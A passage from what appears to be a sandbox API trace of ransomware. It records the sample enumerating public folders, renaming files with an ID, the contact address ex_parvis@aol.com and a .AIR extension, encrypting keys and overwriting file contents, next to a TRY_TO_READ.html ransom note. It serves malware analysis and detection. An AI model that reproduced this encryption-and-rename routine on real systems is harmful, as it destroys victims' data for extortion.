1 [0161.580] FindNextFileW (in: hFindFile=0x35e698, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9791af10, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x9791af10, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9791af10, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0161.580] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Templates\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9791af10, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x9791af10, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9791af10, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff [0161.580] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Desktop\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x978cec50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978cec50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35e6d8 [0161.580] FindNextFileW (in: hFindFile=0x35e6d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x978cec50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978cec50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.580] FindNextFileW (in: hFindFile=0x35e6d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83c279c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x83c279c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x83c4db20, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x7e9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe Reader X.lnk", cAlternateFileName="ADOBER~1.LNK")) returned 1 [0161.580] FindNextFileW (in: hFindFile=0x35e6d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2826d6cd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2826d6cd, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28860dd8, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0161.580] FindNextFileW (in: hFindFile=0x35e6d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7df21ca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7df21ca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7df21ca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x8d1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Google Chrome.lnk", cAlternateFileName="GOOGLE~1.LNK")) returned 1 [0161.580] FindNextFileW (in: hFindFile=0x35e6d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0a09a40, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x485, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mozilla Firefox.lnk", cAlternateFileName="MOZILL~1.LNK")) returned 1 [0161.580] FindNextFileW (in: hFindFile=0x35e6d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x978cec50, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x978cec50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9791af10, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0161.581] FindNextFileW (in: hFindFile=0x35e6d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x978cec50, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x978cec50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9791af10, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0161.581] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.581] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.581] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Desktop\\Mozilla Firefox.lnk", dwFileAttributes=0x80) returned 1 [0161.581] lstrlenW (lpString="C:\\\\Users\\Public\\Desktop\\Mozilla Firefox.lnk") returned 44 [0161.581] GetProcessHeap () returned 0x2e0000 [0161.581] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xbe) returned 0x30e128 [0161.581] lstrcpyW (in: lpString1=0x30e128, lpString2="C:\\\\Users\\Public\\Desktop\\Mozilla Firefox.lnk" | out: lpString1="C:\\\\Users\\Public\\Desktop\\Mozilla Firefox.lnk") returned="C:\\\\Users\\Public\\Desktop\\Mozilla Firefox.lnk" [0161.581] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Desktop\\Mozilla Firefox.lnk", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Desktop\\Mozilla Firefox.lnk.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Desktop\\Mozilla Firefox.lnk.12781717671972518758.ex_parvis@aol.com.AIR" [0161.582] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Desktop\\Mozilla Firefox.lnk" (normalized: "c:\\users\\public\\desktop\\mozilla firefox.lnk"), lpNewFileName="C:\\\\Users\\Public\\Desktop\\Mozilla Firefox.lnk.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\desktop\\mozilla firefox.lnk.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.586] CreateFileW (lpFileName="C:\\\\Users\\Public\\Desktop\\Mozilla Firefox.lnk.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\desktop\\mozilla firefox.lnk.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ec [0161.587] GetProcessHeap () returned 0x2e0000 [0161.587] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0161.587] GetFileSizeEx (in: hFile=0x4ec, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=1157) returned 1 [0161.587] SetFilePointer (in: hFile=0x4ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x485 [0161.587] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.587] GetProcessHeap () returned 0x2e0000 [0161.587] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.587] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.587] WriteFile (in: hFile=0x4ec, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.588] WriteFile (in: hFile=0x4ec, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.588] WriteFile (in: hFile=0x4ec, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.588] ReadFile (in: hFile=0x4ec, lpBuffer=0x31d01e0, nNumberOfBytesToRead=0x485, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d01e0*, lpNumberOfBytesRead=0x2acf9c8*=0x485, lpOverlapped=0x0) returned 1 [0161.588] SetFilePointer (in: hFile=0x4ec, lDistanceToMove=-1157, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.588] WriteFile (in: hFile=0x4ec, lpBuffer=0x31d0670*, nNumberOfBytesToWrite=0x485, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d0670*, lpNumberOfBytesWritten=0x2acf9c8*=0x485, lpOverlapped=0x0) returned 1 [0161.588] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.588] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.589] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Desktop\\Google Chrome.lnk", dwFileAttributes=0x80) returned 1 [0161.589] lstrlenW (lpString="C:\\\\Users\\Public\\Desktop\\Google Chrome.lnk") returned 42 [0161.589] GetProcessHeap () returned 0x2e0000 [0161.589] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xba) returned 0x30e128 [0161.589] lstrcpyW (in: lpString1=0x30e128, lpString2="C:\\\\Users\\Public\\Desktop\\Google Chrome.lnk" | out: lpString1="C:\\\\Users\\Public\\Desktop\\Google Chrome.lnk") returned="C:\\\\Users\\Public\\Desktop\\Google Chrome.lnk" [0161.589] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Desktop\\Google Chrome.lnk", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Desktop\\Google Chrome.lnk.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Desktop\\Google Chrome.lnk.12781717671972518758.ex_parvis@aol.com.AIR" [0161.589] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Desktop\\Google Chrome.lnk" (normalized: "c:\\users\\public\\desktop\\google chrome.lnk"), lpNewFileName="C:\\\\Users\\Public\\Desktop\\Google Chrome.lnk.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\desktop\\google chrome.lnk.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.592] CreateFileW (lpFileName="C:\\\\Users\\Public\\Desktop\\Google Chrome.lnk.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\desktop\\google chrome.lnk.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ec [0161.592] GetProcessHeap () returned 0x2e0000 [0161.592] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0161.592] GetFileSizeEx (in: hFile=0x4ec, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=2257) returned 1 [0161.592] SetFilePointer (in: hFile=0x4ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x8d1 [0161.592] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.592] GetProcessHeap () returned 0x2e0000 [0161.592] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.593] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.593] WriteFile (in: hFile=0x4ec, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.594] WriteFile (in: hFile=0x4ec, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.594] WriteFile (in: hFile=0x4ec, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.594] ReadFile (in: hFile=0x4ec, lpBuffer=0x31d01e0, nNumberOfBytesToRead=0x8d1, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d01e0*, lpNumberOfBytesRead=0x2acf9c8*=0x8d1, lpOverlapped=0x0) returned 1 [0161.594] SetFilePointer (in: hFile=0x4ec, lDistanceToMove=-2257, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.594] WriteFile (in: hFile=0x4ec, lpBuffer=0x3b1410*, nNumberOfBytesToWrite=0x8d1, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b1410*, lpNumberOfBytesWritten=0x2acf9c8*=0x8d1, lpOverlapped=0x0) returned 1 [0161.594] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.594] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.594] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Desktop\\desktop.ini", dwFileAttributes=0x80) returned 1 [0161.595] lstrlenW (lpString="C:\\\\Users\\Public\\Desktop\\desktop.ini") returned 36 [0161.595] GetProcessHeap () returned 0x2e0000 [0161.595] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xae) returned 0x33b3e8 [0161.595] lstrcpyW (in: lpString1=0x33b3e8, lpString2="C:\\\\Users\\Public\\Desktop\\desktop.ini" | out: lpString1="C:\\\\Users\\Public\\Desktop\\desktop.ini") returned="C:\\\\Users\\Public\\Desktop\\desktop.ini" [0161.595] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Desktop\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Desktop\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Desktop\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" [0161.595] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Desktop\\desktop.ini" (normalized: "c:\\users\\public\\desktop\\desktop.ini"), lpNewFileName="C:\\\\Users\\Public\\Desktop\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\desktop\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.598] CreateFileW (lpFileName="C:\\\\Users\\Public\\Desktop\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\desktop\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ec [0161.598] GetProcessHeap () returned 0x2e0000 [0161.598] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33b3e8 | out: hHeap=0x2e0000) returned 1 [0161.598] GetFileSizeEx (in: hFile=0x4ec, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=174) returned 1 [0161.598] SetFilePointer (in: hFile=0x4ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xae [0161.598] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.598] GetProcessHeap () returned 0x2e0000 [0161.598] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.598] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.598] WriteFile (in: hFile=0x4ec, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.599] WriteFile (in: hFile=0x4ec, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.599] WriteFile (in: hFile=0x4ec, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.599] ReadFile (in: hFile=0x4ec, lpBuffer=0x33b3e8, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33b3e8*, lpNumberOfBytesRead=0x2acf9c8*=0xae, lpOverlapped=0x0) returned 1 [0161.599] SetFilePointer (in: hFile=0x4ec, lDistanceToMove=-174, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.599] WriteFile (in: hFile=0x4ec, lpBuffer=0x33b4a0*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33b4a0*, lpNumberOfBytesWritten=0x2acf9c8*=0xae, lpOverlapped=0x0) returned 1 [0161.600] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.600] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.600] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Desktop\\Adobe Reader X.lnk", dwFileAttributes=0x80) returned 1 [0161.600] lstrlenW (lpString="C:\\\\Users\\Public\\Desktop\\Adobe Reader X.lnk") returned 43 [0161.600] GetProcessHeap () returned 0x2e0000 [0161.600] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xbc) returned 0x30e128 [0161.600] lstrcpyW (in: lpString1=0x30e128, lpString2="C:\\\\Users\\Public\\Desktop\\Adobe Reader X.lnk" | out: lpString1="C:\\\\Users\\Public\\Desktop\\Adobe Reader X.lnk") returned="C:\\\\Users\\Public\\Desktop\\Adobe Reader X.lnk" [0161.601] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Desktop\\Adobe Reader X.lnk", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Desktop\\Adobe Reader X.lnk.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Desktop\\Adobe Reader X.lnk.12781717671972518758.ex_parvis@aol.com.AIR" [0161.601] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Desktop\\Adobe Reader X.lnk" (normalized: "c:\\users\\public\\desktop\\adobe reader x.lnk"), lpNewFileName="C:\\\\Users\\Public\\Desktop\\Adobe Reader X.lnk.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\desktop\\adobe reader x.lnk.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.604] CreateFileW (lpFileName="C:\\\\Users\\Public\\Desktop\\Adobe Reader X.lnk.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\desktop\\adobe reader x.lnk.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ec [0161.604] GetProcessHeap () returned 0x2e0000 [0161.604] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0161.604] GetFileSizeEx (in: hFile=0x4ec, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=2025) returned 1 [0161.604] SetFilePointer (in: hFile=0x4ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x7e9 [0161.604] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.604] GetProcessHeap () returned 0x2e0000 [0161.604] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.604] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.604] WriteFile (in: hFile=0x4ec, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.605] WriteFile (in: hFile=0x4ec, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.605] WriteFile (in: hFile=0x4ec, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.605] ReadFile (in: hFile=0x4ec, lpBuffer=0x31d01e0, nNumberOfBytesToRead=0x7e9, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d01e0*, lpNumberOfBytesRead=0x2acf9c8*=0x7e9, lpOverlapped=0x0) returned 1 [0161.605] SetFilePointer (in: hFile=0x4ec, lDistanceToMove=-2025, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.605] WriteFile (in: hFile=0x4ec, lpBuffer=0x3b1410*, nNumberOfBytesToWrite=0x7e9, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b1410*, lpNumberOfBytesWritten=0x2acf9c8*=0x7e9, lpOverlapped=0x0) returned 1 [0161.606] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Documents\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x978cec50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978cec50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35e718 [0161.606] FindNextFileW (in: hFindFile=0x35e718, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x978cec50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978cec50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.606] FindNextFileW (in: hFindFile=0x35e718, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28697d55, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28697d55, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0161.606] FindNextFileW (in: hFindFile=0x35e718, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, 